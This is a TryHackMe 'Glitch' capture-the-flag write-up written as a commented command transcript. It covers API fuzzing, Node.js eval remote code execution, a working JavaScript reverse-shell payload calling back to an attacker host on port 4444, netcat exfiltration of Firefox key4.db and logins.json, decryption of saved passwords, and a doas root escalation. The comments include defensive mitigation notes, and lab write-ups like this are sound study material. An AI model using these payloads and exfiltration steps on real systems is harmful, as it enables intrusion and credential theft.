
TryHackMe - Glitch


My attack chain for Glitch: API fuzzing to Node.js RCE, then decrypting saved Firefox passwords.

Attack Chain

# Interactive transcript of the Glitch chain, read top to bottom: recon, API
# parameter fuzzing, Node.js eval RCE, reverse shell, Firefox credential
# decryption (horizontal privesc), then doas (vertical privesc).
# Shell lines run on the attacking box unless a "target-machine" comment says
# otherwise; bare "api/item?cmd=..." lines are URL paths typed into the
# browser, not shell commands.
export ip=<redacted>
firefox http://$ip
firefox http://$ip/api/access

# add this_is_not_real cookie in the page
firefox http://$ip 

firefox http://$ip/js/script.js 
# fuzz API parameters
# --hc 400 hides HTTP 400 responses, so only parameter names the API
# accepts are left in the output (the word list is reused as parameter names).
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -X POST --hc 400 -u http://$ip/api/items\?FUZZ\=test

# EXPLOIT node js eval check 
# Presumably the route hands the cmd query parameter to eval() -- confirm in
# /var/web/routes/api.js, read further down. Any JS expression, and via
# require() any Node module, then runs inside the server process. The fix on
# the application side is to never evaluate request input; for detection,
# query strings carrying require( or child_process are the obvious signal.
# NOTE(review): this line uses /api/item while the wfuzz line and the
# URL-encoded read below use /api/items -- confirm the route name.
firefox http://$ip/api/item?cmd=1
api/item?cmd=process.cwd()
api/item?cmd=var fs=require("fs");fs.readdirSync("/var/web").toString('utf8')
api/item?cmd=var fs=require("fs");fs.readFileSync("/var/web/app.js").toString('utf8')

# view api.js
# Same file read as above, URL-encoded so the '=' (%3d) and ';' (%3b) survive
# in the query string; '+' stands for the space.
/api/items?cmd=var+fs%3drequire("fs")%3bfs.readFileSync("/var/web/routes/api.js").toString('utf8')
# ACCESS: reverse shell
# Spawns /bin/sh inside the Node process and pipes it over an outbound TCP
# connection to port 4444 on the attacking box (<sanitized>); the trailing
# "return /a/" presumably just gives the handler a value to respond with.
# From the defender's side, a web server process opening an outbound TCP
# connection is the detection signal, and egress filtering blocks it.
api/item?cmd=(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<sanitized>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();

# target-machine
# upgrade the dumb shell to a full pty
python3 -c 'import pty; pty.spawn("/bin/bash")'
cat /home/user/user.txt
# the Firefox profile left on the box is what the next step pulls from
cd /home/user/.firefox 

# HORIZONTAL PRIVESC: firefox keys
# transferring firefox keys 
# Two transfers, listener side first: the "-l" lines receive on the attacking
# box, the "-nv <redacted>" lines send from the target. key4.db holds the
# profile's key material and logins.json the encrypted saved logins; both are
# needed to decrypt. Mitigation: do not leave browser profiles with saved
# credentials on servers, or at least set a primary password on the profile.
nc -l -p 1234  > key4.db < /dev/null
nc -nv <redacted> 1234 < key4.db
nc -l -p 1234  > logins.json < /dev/null 
nc -nv <redacted> 1234 < logins.json

# firepwd firefox 
# -d is the directory holding key4.db and logins.json -- presumably the
# directory the nc transfers above wrote into; adjust if they landed elsewhere.
python firepwd.py -d /

# password recovered from the decrypted Firefox logins
su v0id # pass: love_the_void

# VERTICAL PRIVESC: doas
# The doas config (not shown here) evidently lets v0id run commands as root;
# whoami is the sanity check before spawning the shell. Mitigation: scope doas
# rules to specific commands instead of an unrestricted root shell.
doas -u root whoami
doas -u root /bin/bash
cat /root/root.txt

Tools